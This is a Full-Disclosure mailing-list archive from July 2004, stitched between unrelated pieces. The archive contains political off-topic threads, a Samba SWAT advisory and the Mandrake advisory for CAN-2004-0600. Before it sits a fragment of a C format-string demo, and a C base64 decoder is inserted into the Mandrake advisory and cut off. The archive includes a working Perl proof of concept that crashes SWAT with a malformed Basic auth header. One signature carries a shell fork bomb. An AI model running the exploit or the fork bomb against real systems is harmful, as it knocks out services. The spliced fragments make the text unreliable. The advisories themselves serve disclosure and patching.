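        if (*s != '%')
            continue;
        if (s[1] == '%') {      /* escaped percent, not a directive */
            s++;
            continue;
        }
        n++;
    }
    return n;
}

/* VULNERABLE pattern (shown only as a comment, never executed here):
 *     demo_log(out, cap, untrusted);
 * Any directives inside `untrusted` would be interpreted against
 * arguments that were never passed.
 *
 * HARDENED pattern: the format is a constant, the data is an argument. */
static int log_untrusted(char *out, size_t cap, const char *untrusted)
{
    return demo_log(out, cap, "%s", untrusted);
}

int main(void)
{
    /* Constructed sample of remote-controlled text containing directives. */
    const char *peer_text = "proxy error: %x%x%n%s";
    char line[128];

    log_untrusted(line, sizeof line, peer_text);
    printf("directives in input: %d\n", count_directives(peer_text));
    printf("logged verbatim:     %s\n", line);
    return 0;
}
```
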

[Full-Disclosure] [OT] assembly

2004-07-22 Thread Michael Kurz
Hey,
can someone tell me the difference between
1. lea 0x7(%esp,1), %eax
and
2. lea 0x8(%esp), %eax
I think there's no difference.
Thanks
Michael
--
~#:(){ :|:&};:


[Full-Disclosure] dha script

2004-07-22 Thread Brian Toovey

Anyone have a simple script to mock a dha against port 25?  I am attempting to provide a demo of a DHA protection system.

Brian Toovey
Senior Security Analyst
igxglobal
389 Main Street Suite 206
Hackensack, NJ 07601
Ph: 201-498-0555x2225
[EMAIL PROTECTED]
PGP Key: http://www.igxglobal.com/pgp/index.html

Subscribe to the igxglobal Daily Security Briefing
http://www.igxglobal.com/dsb/register.html

igxglobal announces Daily Security Briefing newsletter
http://www.prweb.com/releases/2004/5/prweb123759.htm

igxglobal delivers integrated real-time security reporting
http://www.igxglobal.com/rrf.html





RE: [Full-Disclosure] OFF TOPIC: antisemitic troll

2004-07-22 Thread Ron DuFresne

[SNIP]

>
> Your comment that 'One man's opinion is hardly proof' seems a tad inane
> doesn't it? After all, the content of the site is *not* 'one man's
> opinion'. It is a collection of articles from mainstream media agencies,
> not one man's opinion. If you read the text you quoted, it says 'one
> man's effort', it says absolutely nothing about 'opinion'.
>


The choice of articles used on the site might actually be the basis of the
"One man's opinion" quote made in the prior post.  If the selected
articles are not equally balanced then indeed there is a single opinion
being displayed.  But, certainly this is not an argument for this list.

I, like many others here have opinions in this area, but, they do not
belong on this list.  So, if others wish to discuss these matters, let's
take it off list here, either to private e-mail or form a list
specifically for this kind of discussion and let those seeking security
information on OS/application/networking get back to their searches.

Thanks,


Ron DuFresne
~~
"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation." -- Johnny Hart
***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D.  Just don't touch anything.



Re: [OT] Middle East (was Re: [Full-Disclosure] IE)

2004-07-22 Thread Ron DuFresne


I'm going to hate having to filter via procmail some of these folks, some
have had real and interesting information relating to this list.  But, if
folks persist in trying to express an agenda of politics towards this list
that should not apply to it, so be it.  Please take this off list or
form/find a list for such debate, I might even choose to engage that list,
but, when we read this list we're not seeking political agendas and rants,
we're trying to keep up with the risks our networks and systems suffer.
So please find a different and more appropriate venue for this discussion.

Thanks,

Ron DuFresne
~~
"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation." -- Johnny Hart
***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D.  Just don't touch anything.



[Full-Disclosure] Samba 3.x swat preauthentication buffer overflow

2004-07-22 Thread Evgeny Demidov
Name:          Samba 3.x swat preauthentication buffer overflow
Date:          22 July 2004
CVE candidate: CAN-2004-0600
Author:        Evgeny Demidov

Description:
There exists a remote preauthentication buffer overflow in 
Samba 3.x swat administration service.
All versions of Samba 3.0.2-3.0.4 are vulnerable to our 
knowledge.

Fix:
Samba 3.0.5 which fixes this problem is available: 
http://www.samba.org/samba/whatsnew/samba-3.0.5.html

History:
28 April 2004 - vulnerability has been discovered during 
Samba source code audit by Evgeny Demidov
29 April 2004 - vulnerability details have been made 
available to VulnDisco clients
14 July  2004 - vulnerability has been reported to Samba 
Team
22 July  2004 - public release of the advisory



Re: [Full-Disclosure] OFF TOPIC: antisemitic troll

2004-07-22 Thread Valdis . Kletnieks
On Thu, 22 Jul 2004 11:11:00 +1000, Brad Griffin <[EMAIL PROTECTED]>  said:

> two recent examples. Here we have someone talking about 3000 year old
> history in 2004! What the  relevance does ancient history have to do
> with the systematic destruction of another culture/society today

Both sides of that conflict have a legitimate claim that the other side has
been trying to destroy them for millennia.  When both sides are engaged in
attempted "systematic destruction" of the other as retribution for the
millennia, it has a LOT of relevance.





Re: [Full-Disclosure] IE

2004-07-22 Thread Barry Fitzgerald
Stephen Taylor wrote:
> Is this a moderated list or is this a venue for anti-semitic diatribes?
> Please let me know because I want to drop out if the totally biased,
> off-topic comments can't be controlled.
> SteveTaylor
 

Being opposed to Israeli political policies is about as anti-semitic as
being opposed to United States policies is unamerican...
Which is to say that it's not...
But, there's a whole boatload of deluded self-interested people out
there who think that it is.
-Barry


[Full-Disclosure] "Fud, lies and libel" against (type any name here, I'll use mi2g)

2004-07-22 Thread Robert Wayne
Hi there,

I am a usual reader of all the major security lists and I laughed (in a way)
to the posting about "Wendy's order system"... I laughed because at first
glance I thought it was funny, but then I realised that what I was reading
was a "vulnerability" on a security list, so it wasn't clear to me what that
stupid joke was doing there. Ok, it's true.. full-disclosure is not
moderated, everybody can post, yeah yeah, blah blah blah, but still: It is
(meant to be) a security list. Am I wrong?.

Please note that this is not just about another silly off-topic: someone
deliberately posted a vulnerability, perfect in its structure,
with all the right fields in the right place, on more than one security
list. There is more than off-topic here.
Ok, the content was clearly a hoax but it denotes a problem that could be
much more dangerous...

Let me point out that, as claims the anonymous guy that posted the (two?)
articles, I'm not affiliated with mi2g.

I thought about not replying and wasting my time, but given the fact that
your stupid postings are going on, and some other people give you even
credit for that, I would like to say something as well. Hope you don't mind.
Hope the list doesn't mind. It is not something off-topic in my opinion,
because it is strictly related to the way the security information is
diffused so it is inherently about security.

Before I proceed with the security issues related to the original post about
"Wendy", I would like to explore some of the points you have made:

-

>Instead of laughing along with the obvious hoax, mi2g responded in typical
>fashion by releasing a "News Alert" in which they spread FUD, lie about...

I don't understand your point. I can laugh, you can laugh... but they are
defamed! Can you explain why they should laugh? I don't get it...

>Ransom demands?  Negative publicity?  Reputation damage accelerates?
>mi2g is saying that "trusted web sites and security portals" posting
>the original hoax have contacted mi2g, offering to not post it in return
>for up to one MILLION dollars.  Who are these black hearted criminals?

First: my impression is that they are not referring to the sites you are
talking about. I don't see anywhere in their message: "trusted web sites and
security portals posting the original hoax have contacted mi2g". Are you
making it up (lying) ?

Second: are you working for all the sites mi2g is referring to, that you are
so confident in excluding this possibility?

Who gives you the right to judge something you don't know anything about? It
appears to me that you've spent many (valuable?) of your hours discrediting
that company, as well as bothering us (at least me) with your statements.

Either you know something we don't or you'd better be silent. I can't tell
if what mi2g says is true or not, I don't work there... do you? If I don't
know something I tend not to speak publicly about it... at very least I
don't try to sell it as THE TRUTH!

>Because of this obvious advisory parody, the poor masses are going to
>have a hard time figuring out which advisories are legitimate?  I think
>mi2g assumes every security professional and administrator is as big
>a retard as themselves.

Again, I do not agree with you. The whole point of their statement is not
about "Wendy"!

Here it seems that YOU have some problems in comprehending the bottom line
message (please note that I am not saying you are a retard):



"If you can so easily post a clear hoax and nobody - or very few of them -
bothers to check, who can stop you from publishing a "real" (note the
quotes!) vulnerability disclosure, more realistic than "Wendy's", attacking
your competitor A or a product B ? What if you start publishing ten of them,
and then hundreds? How this massive pollution of security lists and sites
will change the user perception of a company A or product B? Will you buy a
product from a company that has hundreds of so called vulnerabilities? I bet
you wouldn't, at least you'll think about it twice... It doesn't really
matter if they are real or not, they are listed everywhere, so the
perception of them makes them real.

If you have the power to disseminate a big number of lists (as well as very
important web sites like securityfocus.com, that mirror any list without
questioning the authenticity of the postings) with false vulnerabilities,
you can discredit and damage any company. Full stop".



You got it?

This is the message I understood from mi2g's reply and it makes perfect
sense to me. Between you and me,  it looks like you have already started
this process against mi2g... Lies, false allegations, unreal
vulnerabilities, all posted to public lists... You are working very hard...
Is there at least someone paying you for this job?

>One out of three correct, good job mi2g!  Again, check the archives.

I found also a posting on ISN that mi2g seems to have missed... Should I let
them know?!? Hint: Don't look 

RE: [Full-Disclosure] OFF TOPIC: antisemitic troll

2004-07-22 Thread James . Cupps
First of all this is off topic but I think that in this case I like it that
way. 

I like FD.

I like the fact that if you know what you are looking for you can preempt a
patch notification by days by watching this list.

I like being able to see emerging mindsets and strategies that I might have
to use or be prepared to defend against.

I like the snippets of usable code (rare though they are) that are often not
available elsewhere (you gotta like it if packetstorm and focus don't have
it).

I even like the occasional troll to break up the monotony (despite the fact
that many in my office think my humor is odd) 

How is that virus infection Billy? 

Uh oh fatal code snowcrash snip snip snip...

Ok back up. 

That said this discussion is becoming damaging. The fact is that both sides
are dogmatic. Neither will convince the other of the error of their ways.
Both have legitimate arguments. Both have facts to back their arguments and
both have lies to back their arguments. Both sides have perpetrated heinous
acts against the other and both have been victims of them. We aren't going
to solve them on this board. For that matter the only way that I think they
will ever be reduced is if the Palestinians manage to come up with their own
version of Gandhi or MLK. Otherwise they will both keep killing each other
for ever and blaming the other. 

So please stop this. It is only making people mad and not serving any good.

James Cupps
Information Security Officer




Re: [Full-Disclosure] Re: OFF TOPIC: antisemitic troll

2004-07-22 Thread Jeremiah Cornelius
On Thursday 22 July 2004 03:10, Feher Tamas wrote:
> Anti-semites should not use the Internet, because TCP and UDP are
> the protocols of the elders of zion

Wow!  I missed that in the RFC. :-)



Re: [Full-Disclosure] "Fud, lies and libel" against (type any name here, I'll use mi2g)

2004-07-22 Thread Siegfried
heh? you're the one who is trying to defend mi2g, i think you're that writer
from uk(?), i don't know if you're their friend or whatever. I mean look..
http://www.mi2g.com/cgi/mi2g/media.php
they are stealing news and many things from some sites for years (everybody
knows which ones), and they're whining because someone posted a fake and
funny advisory about them? come on, there are every week! just by checking
the original email we know if it's real or not.. and if someone really wants
to release a fake advisory (appearing real) to attack another vendor, i'm
sure that the other vendor or readers would point it out.. if you don't
trust unmoderated security mailing lists, then read the moderated ones, or
look at the security sites which are writing summaries or just putting the
good advisories together. Don't blame fd if it's unmoderated i think there
were already many threads about it.
I don't see why a security would pay  $250,000 to $1 million because
they're forwarding "unmoderated and automatic messages", if it's real
it is nonsense, or maybe it's a hoax, you guys @ mi2g like to write news
for journalists, not for security sites.. things like "macosx is the most
secure OS" and sell the paper full of stolen datas for hundreds of dollars.
and the advisory posted on isn is still available, i'm sure they laughed on
it so they published it, they usually don't post advisories.
so what's next? mi2g SA - social engineering vuln in multiple mailing lists
??
who cares



[Full-Disclosure] Affordable Network Behavior Analysis alternatives

2004-07-22 Thread Jeff Gillian
Hi list,

Since it appears the SecurityFocus Sectools and IDS lists are dead, I
thought I'd repost this here.

I recently saw a posting on FocusIDS regarding the high cost of the
most commercial solutions. The one mentioned was the QRadar product
from Q1Labs. Don't get me wrong, we have a budget, we just don't have
a Fortune 500 budget. :)

My question is simple, are there any other commercial out-of-the-box
alternatives to QRadar? Something that isn't going to cost me >$40,000
to deploy?

Any input would be appreciated.

Regards,

Jeff G.



Re: [Full-Disclosure] Affordable Network Behavior Analysis alternatives

2004-07-22 Thread Steven Rakick
Jeff,

You may want to take a look at the nSight behavior
analysis product from Intrusense
(http://www.intrusense.com). 

We were actually in a similar bind a while back and
came across their beta program. We've been using it
ever since and will be buying it as soon as their
release version comes out. 

It has both standalone and distributed installation
types and dead simple to install and configure.
Overall it has less functionality than QRadar but it
made up for that in cost. While we haven't
*officially* purchased it yet, we were quoted under
$10,000 for the distributed version with support for 3
collector agents.

Still too much? You may also want to take a look at
Snort and Ntop then.

Feel free to email me if you want more details.


Steve




[Full-Disclosure] SWAT PreAuthorization PoC

2004-07-22 Thread bugtraq
Hi,

The following is a brief proof of concept exploit code for the vulnerability 
mentioned in "Evgeny Demidov" <[EMAIL PROTECTED]>'s advisory: Samba 3.x swat 
preauthentication buffer overflow

Running the perl script against a vulnerable SWAT server will cause:
Program received signal SIGSEGV, Segmentation fault.
[Switching to process 30853]
0x410957af in memcpy () from /lib/tls/libc.so.6


Exploit:
#!/usr/bin/perl
# Samba 3.0.4 and prior's SWAT Authorization Buffer Overflow
# Created by Noam Rathaus of Beyond Security Ltd.
#

use IO::Socket;
use strict;

my $host = $ARGV[0];

my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host, 
PeerPort => "901" );

unless ($remote) { die "cannot connect to http daemon on $host" }

print "connected\n";

$remote->autoflush(1);

my $http = "GET / HTTP/1.1\r
Host: $host:901\r
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7) Gecko/20040712 
Firefox/0.9.1\r
Accept: text/xml\r
Accept-Language: en-us,en;q=0.5\r
Accept-Encoding: gzip,deflate\r
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r
Keep-Alive: 300\r
Connection: keep-alive\r
Authorization: Basic =\r
\r
";

print "HTTP: [$http]\n";
print $remote $http;
sleep(1);
print "Sent\n";

while (<$remote>)
{
 print $_;
}
print "\n";

close $remote;

-- 
Thanks
Noam Rathaus
CTO
Beyond Security Ltd.

Join the SecuriTeam community on Orkut:
http://www.orkut.com/Community.aspx?cmm=1



Re: [Full-Disclosure] OFF TOPIC: antisemitic troll

2004-07-22 Thread shr3kst3r
I believe this whole discussion is an attempt by the "evil" black hats
to confuse and misdirect the "good" white hats.  So, now that the
"good" white hats (confused and misdirected) are talking about all the
issues surrounding Israel, the "evil" black hats are hacking into the
"good" white hats' computers and downloading pr0n.

shr3k
-- 
"I don't care what everyone likes. Ogres are not like
cakes... You dunce, irritating, miniature beast of 
burden. Ogres are like onions. End of story. 
Bye bye. See ya later..." -- Shrek



Re: [Full-Disclosure] multiple web browsers, multiple bugs - onUnload and location.href

2004-07-22 Thread Peter Besenbruch
Rudolf Polzer wrote:
> ...Try http://www.informatik.uni-frankfurt.de/~polzer/rbiclan/location
> The page is SUPPOSED to prevent going to somewhere else by changing
> the URL back in onUnload (even that is already a reason to disable
> JavaScript).
> The interesting part is: depending on browser, you see different bugs...
> Mozilla, Netscape 7 or Firefox: almost works correctly. Except for two
> small bugs: View source shows the source of Google or where you TRIED
> to go to, while you SEE the unload-trap page. The other bug: when you
> close the browser window, onUnload is executed TWICE (you see two
> alert boxes, with the number increasing) and the new page is loaded,
> but not displayed. But the view-source bug somehow looks suspicious.
> Do other parts of Mozilla think it was another website too?

I ran Firefox 0.8 for Linux on KDE, and enabled all Javascript 
capabilities in my options for this test. I also run with the Tabbrowser 
Extensions set to open all clicked links in a new tab. I ran into what 
you described, with the exception that viewing the source of the 
original page and the links worked fine. The other links also opened 
properly in new tabs, with no alerts. One of the features of the 
Tabbrowser Extension that I appreciate is the ability to surf with 
Javascript disabled, but with the ability to activate it via a double 
click for those Web sites that need it.


Hawaiian Astronomical Society: http://www.hawastsoc.org
HAS Deepsky Atlas: http://www.hawastsoc.org/deepsky


Re: [Full-Disclosure] OFF TOPIC: antisemitic troll

2004-07-22 Thread Valdis . Kletnieks
On Thu, 22 Jul 2004 12:46:00 EDT, [EMAIL PROTECTED] said:

> to solve them on this board. For that matter the only way that I think they
> will ever be reduced is if the Palestinians manage to come up with their own
> version of Gandhi or MLK.

I suspect *that* conflict will require *both* sides to have their own version
in the same generation.  Gandhi and MLK succeeded because in both cases, their
opponents realized that using a bulldozer to clear 25,000 protesters out was,
if not morally unjustifiable, at least such bad PR that it wasn't an option.
The solutions needed are different when both sides feel the bulldozer (and
more) is justified

Anyhow, enough on this... let's talk about on-topic lowlife scum:

http://www.cnn.com/2004/LAW/07/21/cyber.theft/index.html

:)





Re: [Full-Disclosure] antisemtism, FD and bandwidth - why it's all a joke

2004-07-22 Thread VX Dude
--- Harlan Carvey <[EMAIL PROTECTED]> wrote:
> Raymond,
> 
> > It merely is the trade-off of total
> > freedom of speech, which this list tries to
> > maintain.
> 
> I agree with you on that.  One would hope that
> people
> would realize that with free speech (and other
> freedoms) comes responsibility...or at the very
> least,
> observe some modicum of courtesy.  However, that
> very
> little bit seems to be far too much to expect.  
> 

It's funny to hear about "responsibility" and
"courtesy" on full-disclosure.  Full-disclosure does
not owe its existence because of these terms, and
realistically it doesn't owe it to "free speech".  As
Marcus Random says  "the proponents of disclosure have
won (largely by virtue of the fact that nobody can
stop them)".

This list exists because no one can stop you guys from
your irresponsible use of free speech.  The good
flip of the coin is that you guys can't stop us from
being just as irresponsible, hence you're going to
continue to get emails from hush.com and gobbles and
software source club, and who else wants to post.  I
didn't join just to add more noise to the signal
(that's just a fun benefit), but to grab the viruses
that come off this list (hence the name).  You guys
are so protective of your right to be irresponsible
that you guys are afraid of installing a virus scanner
on the mailing list server.

You have to love the irony that full-disclosure may
die for the same reasons it was born.  You also have
to love the irony that Israel and Palestine have more
anti-Semitism than anywhere in the world, because
they're both semites and they hate each other.

Ahhh... the world is a fun place to live.  A shame you
guys take it too seriously.



[Full-Disclosure] [OT] redirection exploit in FD

2004-07-22 Thread John Dowling
This is no hoax! 

I hate hoax warnings, but this one is important.  

If a man comes to your front door and says he is
conducting a survey and 
asks you to show him your ass, DO NOT show him your
ass.  This is a scam; he 
only wants to see your ass. 

I wish I'd gotten this yesterday.  I feel so stupid
and cheap.

*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~

Okay, all kidding aside.  

I feel very secure knowing that one of the world's
foremost security admin mailing lists is currently
filled with OT chatter, and 'hey shut up!' posts. 
This indicates to me that there are currently no major
issues to address other than who had more toys as a
child. fantastic.

Is this REALLY a security mailing list? 

A few suggestions to those persons who are inclined to
 discuss things other than security:
1) get a puppy
2) start a 'blog'
3) join a 12-step group
4) consult a professional
5) hunt for vulnerabilities in pron sites
-OR-
6) Find the appropriate venue to voice your opinions
and do so.  For example, if your topic is 'politics'
you could visit 'Google Groups'
(http://groups.google.com) and search for the word
'politics'.  Oh, and then press 'Search'.

'nuff said.





Re: [OT] Middle East (was Re: [Full-Disclosure] IE)

2004-07-22 Thread Billy B. Bilano
Hey dudes!
I have to chime in on this one because it's a topic I have personal 
experience with! At the bank I work at we have a lot of employees of all 
colors and creeds. We are an equal opportunity exploiter (LOL)! We view 
ourselves as bank employees and not people. It's sort of silly but we do 
it anyway!

So anyway, there was this Jewish guy and this Arab chap that worked 
together here in the IT department. They would go to lunch together a 
lot and would joke about stuff. They were real chummy about things and I 
was even invited to the Arab guy's BBQ picnic (he had a cool pool for me 
to wade in and I almost drowned because I can't swim). The fact that a 
Jew and an Arab were friends... I think there is a lesson to be learned 
there, guys! But, then again, they were both really dumb and they called 
soccer "football", so I think it goes without saying that they were both 
morons.

I let them go after the port 443 virus (which was discovered by me) 
attacked so I would not have to put up with their crap anymore.

P.S. Check my bloglog! http://www.bilano.biz/ because there's another 
good story about race relations in a bank and because it's cool! LOL!

P.P.S. Where is my Orkut invite!??! Come on, dudes!
--
Mr. Billy B. Bilano, MSCE, CCNA

Expert Sysadmin Since 2003!
'C:\WINDOWS, C:\WINDOWS\GO, C:\PC\CRAWL'  -- RMS


RE: [Full-Disclosure] Affordable Network Behavior Analysis alternatives

2004-07-22 Thread jason.heschel
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

We're using nSight Behavior Console right now. It's working very well.
Not sure what else is out there.  Maybe Snort?

JH

> Jeff Gillian  [EMAIL PROTECTED] wrote:
>
> Hi list,
>
> Since it appears the SecurityFocus Sectools and IDS
> lists are dead, I
> thought I'd repost this here.
>
> I recently saw a posting on FocusIDS regarding the
> high cost of the
> most commercial solutions. The one mentioned was the
> QRadar product
> from Q1Labs. Don't get me wrong, we have a budget, we
> just don't have
> a Fortune 500 budget. :)
>
> My question is simple, are there any other commercial
> out-of-the-box
> alternatives to QRadar? Something that isn't going to
> cost me >$40,000
> to deploy?
>
> Any input would be appreciated.
>
> Regards,
>
> Jeff G.
-BEGIN PGP SIGNATURE-
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 2.4

wkYEARECAAYFAkEAG7cACgkQOWP3v1q5hd8A2ACfbPIEhu3jfXD0u4WUE50LqQj754sA
oIsMQW4cjIf5XfBRjbR6HLHzycPO
=5tgJ
-END PGP SIGNATURE-






Re: [Full-Disclosure] Vulnerability in sourceforge.net

2004-07-22 Thread Gregory A. Gilliss
Really...FreeBSD comes with user nobody set to /sbin/nologin out of the
box. Maybe they should have chosen a better host OS?

G

On or about 2004.07.22 07:49:53 +, Todd Towles ([EMAIL PROTECTED]) said:

> Sounds like they should have configured that page a bit different...made it
> run under a little less access...or said I say..it is a mis-configuration.
> =)

-- 
Gregory A. Gilliss, CISSP  E-mail: [EMAIL PROTECTED]
Computer Security WWW: http://www.gilliss.com/greg/
PGP Key fingerprint 2F 0B 70 AE 5F 8E 71 7A 2D 86 52 BA B7 83 D9 B4 14 0E 8C A3



Re: [Full-Disclosure] Vulnerability in sourceforge.net

2004-07-22 Thread Jedi/Sector One
On Thu, Jul 22, 2004 at 01:31:21PM -0700, Gregory A. Gilliss wrote:
> Really...FreeBSD comes with user nobody set to /sbin/nologin out of the
> box.

  Wonderful.

  Just like all unix-like systems for 20 years.



Re: [Full-Disclosure] Vulnerability in sourceforge.net

2004-07-22 Thread J.A. Terranson

On Thu, 22 Jul 2004, Gregory A. Gilliss wrote:

> Really...FreeBSD comes with user nobody set to /sbin/nologin out of the
> box.

And this is bad or related how?  I really do not see the connection to
this default setting (a reasonable one) and an admin's failure to config
their web server properly.

> Maybe they should have chosen a better host OS?

What on earth does the host OS have to do with this?

> On or about 2004.07.22 07:49:53 +, Todd Towles ([EMAIL PROTECTED]) said:
>
> > Sounds like they should have configured that page a bit different...made it
> > run under a little less access...or said I say..it is a mis-configuration.

Exactly!  This is host OS independent.

-- 
Yours,

J.A. Terranson
[EMAIL PROTECTED]
0xBD4A95BF

  "...justice is a duty towards those whom you love and those whom you do
  not.  And people's rights will not be harmed if the opponent speaks out
  about them."  Osama Bin Laden
- - -

  "There aught to be limits to freedom!"George Bush
- - -

Which one scares you more?



RE: [Full-Disclosure] Vulnerability in sourceforge.net

2004-07-22 Thread Todd Towles
Does OpenBSD do that?

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Gregory A.
Gilliss
Sent: Thursday, July 22, 2004 3:31 PM
To: [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] Vulnerability in sourceforge.net

Really...FreeBSD comes with user nobody set to /sbin/nologin out of the
box. Maybe they should have chosen a better host OS?

G

On or about 2004.07.22 07:49:53 +, Todd Towles
([EMAIL PROTECTED]) said:

> Sounds like they should have configured that page a bit different...made
it
> run under a little less access...or said I say..it is a mis-configuration.
> =)

-- 
Gregory A. Gilliss, CISSP  E-mail:
[EMAIL PROTECTED]
Computer Security WWW:
http://www.gilliss.com/greg/
PGP Key fingerprint 2F 0B 70 AE 5F 8E 71 7A 2D 86 52 BA B7 83 D9 B4 14 0E 8C
A3



Re: [Full-Disclosure] Vulnerability in sourceforge.net

2004-07-22 Thread Anders B Jansson
nobody:*:32767:32767:Unprivileged user:/nonexistent:/sbin/nologin
Todd Towles wrote:
Does OpenBSD do that?
-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Gregory A.
Gilliss
Sent: Thursday, July 22, 2004 3:31 PM
To: [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] Vulnerability in sourceforge.net
Really...FreeBSD comes with user nobody set to /sbin/nologin out of the
box. Maybe they should have chosen a better host OS?
G
On or about 2004.07.22 07:49:53 +, Todd Towles
([EMAIL PROTECTED]) said:

Sounds like they should have configured that page a bit different...made
it
run under a little less access...or said I say..it is a mis-configuration.
=)



[Full-Disclosure] RE: Full-Disclosure antisemtism, -Steer it a bit back on topic-

2004-07-22 Thread RandallM
Maarten,all,

I might add that security is a big part of this subject considering
cyber-war being implemented from both sides.

thank you
Randall M
 
 

<|>--__--__--
<|>
<|>Message: 6
<|>From: Maarten <[EMAIL PROTECTED]>
<|>To: [EMAIL PROTECTED]
<|>Subject: Re: [Full-Disclosure] antisemtism, FD and bandwidth 
<|>- what I want out of it
<|>Date: Thu, 22 Jul 2004 14:03:20 +0200
<|>
<|>On Thursday 22 July 2004 13:07, Harlan Carvey wrote:
<|>
<|>> Consider this...this is a public list and people will
<|>> knowing post off-topic.  Sometimes they'll even say,
<|>> "hey, this is off topic".  Now, what would happen if
<|>> you were sitting around having a couple of beers w/
<|>> your buddies and a friend of yours walked up and just
<|>> started talking about something that hand nothing
<|>> whatsoever to do with what you and your buds were
<|>> talking about?  Would you be the one to do that to
<|>> your friends?  How about a group of strangers?
<|>
<|>Except that in that social context you cannot really say there is no 
<|>moderation.  Moderation will not be official, sure, but body 
<|>language, 
<|>awkward looks and maybe a wisecrack or two will most of the 
<|>time quickly shut 
<|>up that person.  Or they will continue their conversation in 
<|>a smaller 
<|>circle, all things that are impossible or at least difficult 
<|>to do on a ML. 
<|>On a mailinglist you can continue off-list, but that is a one-to-one 
<|>conversation, not a fork like you can have in your bar scenario.
<|>Also, if the guy won't stop jabbing, you can all start to 
<|>leave and continue 
<|>elsewhere.  This doesn't happen on mailinglists, or at the 
<|>very least it is a 
<|>process that takes months to complete, instead of seconds.
<|>
<|>To steer a little bit back to on-topic, can we conclude that 
<|>all computer 
<|>systems in israel and the surrounding palestine territories 
<|>are insecure ?
<|>Because, since all real security begins with _physical_ 
<|>security, one can 
<|>easily argue that all those systems are notorously insecure.  ;-)
<|>
<|>Maarten
<|>
<|>-- 
<|>Yes of course I'm sure it's the red cable. I 
<|>guarante[^%!/+)F#0c|'NO CARRIER
<|>



[Full-Disclosure] MDKSA-2004:071 - Updated samba packages fix vulnerability in SWAT, samba-server.

2004-07-22 Thread Mandrake Linux Security Team
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandrakelinux Security Update Advisory
 ___

 Package name:           samba
 Advisory ID:            MDKSA-2004:071
 Date:                   July 22nd, 2004

 Affected versions:      10.0, 9.1, 9.2, Corporate Server 2.1,
                         Multi Network Firewall 8.2
 __

 Problem Description:

 A vulnerability was discovered in SWAT, the Samba Web Administration
 Tool.  The routine used to decode the base64 data during HTTP basic
 authentication is subject to a buffer overrun caused by an invalid
 base64 character.  This same code is also used to internally decode
 the sambaMungedDial attribute value when using the ldapsam passdb
 backend, and to decode input given to the ntlm_auth tool.
 
 This vulnerability only exists in Samba versions 3.0.2 or later; 
 the 3.0.5 release fixes the vulnerability.  Systems using SWAT, the
 ldapsam passdb backend, and those running winbindd and allowing third-
 party applications to issue authentication requests via ntlm_auth
 tool should upgrade immediately. (CAN-2004-0600)
 
 A buffer overrun has been located in the code used to support
 the 'mangling method = hash' smb.conf option.  Please be aware
 that the default setting for this parameter is 'mangling method
 = hash2' and therefore not vulnerable. This bug is present in 
 Samba 3.0.0 and later, as well as Samba 2.2.X (CAN-2004-0686)

 This update also fixes a bug where attempting to print in some cases
 would cause smbd to exit with a signal 11.
 ___

 References:

  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0600
  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0686
 __

 Updated Packages:
  
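
An added example, not Samba's code and not part of the advisory: a strict base64 decoder for an HTTP Basic `Authorization` value, showing the checks that keep a malformed value such as the `Authorization: Basic =` request posted earlier in this digest from ever reaching a copy with a bad length. The names `b64_decode_strict` and `parse_basic_auth`, the return codes and the buffer sizes are assumptions made for this illustration.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

enum { B64_OK = 0, B64_BAD_LENGTH = -1, B64_BAD_CHAR = -2,
       B64_BAD_PADDING = -3, B64_TOO_LARGE = -4, AUTH_MALFORMED = -5 };

/* Map one character of the standard alphabet to its 6-bit value; -1 if invalid. */
static int b64_value(unsigned char c)
{
    if (c >= 'A' && c <= 'Z') return c - 'A';
    if (c >= 'a' && c <= 'z') return c - 'a' + 26;
    if (c >= '0' && c <= '9') return c - '0' + 52;
    if (c == '+') return 62;
    if (c == '/') return 63;
    return -1;
}

/* Decode NUL-terminated base64 into out[0..out_cap). The output size is
 * computed and checked before the first byte is written, and every input
 * character is validated, so no later length fix-up is needed. */
int b64_decode_strict(const char *in, unsigned char *out, size_t out_cap,
                      size_t *out_len)
{
    size_t in_len = strlen(in), pad = 0, need, i, o = 0;

    *out_len = 0;
    if (in_len == 0 || in_len % 4 != 0)
        return B64_BAD_LENGTH;              /* a lone "=" is rejected here */
    if (in[in_len - 1] == '=')
        pad = (in[in_len - 2] == '=') ? 2 : 1;
    need = in_len / 4 * 3 - pad;            /* in_len >= 4, so this cannot underflow */
    if (need > out_cap)
        return B64_TOO_LARGE;

    for (i = 0; i < in_len; i += 4) {
        size_t k, chars = (i + 4 == in_len) ? 4 - pad : 4;
        uint32_t acc = 0;

        for (k = 0; k < 4; k++) {
            int v = 0;                      /* trailing pad positions count as zero bits */
            if (k < chars) {
                unsigned char c = (unsigned char)in[i + k];
                if (c == '=') return B64_BAD_PADDING;   /* '=' anywhere but the tail */
                v = b64_value(c);
                if (v < 0) return B64_BAD_CHAR;
            }
            acc = (acc << 6) | (uint32_t)v;
        }
        /* Bits that do not belong to any output byte must be zero. */
        if ((chars == 2 && (acc & 0xF000)) || (chars == 3 && (acc & 0xC0)))
            return B64_BAD_PADDING;
        out[o++] = (unsigned char)(acc >> 16);
        if (chars > 2) out[o++] = (unsigned char)(acc >> 8);
        if (chars > 3) out[o++] = (unsigned char)acc;
    }
    *out_len = o;
    return B64_OK;
}

/* Split the value of an Authorization header ("Basic <base64>") into user and
 * password. The scheme match is case-sensitive to keep the example short. */
int parse_basic_auth(const char *value, char *user, size_t user_cap,
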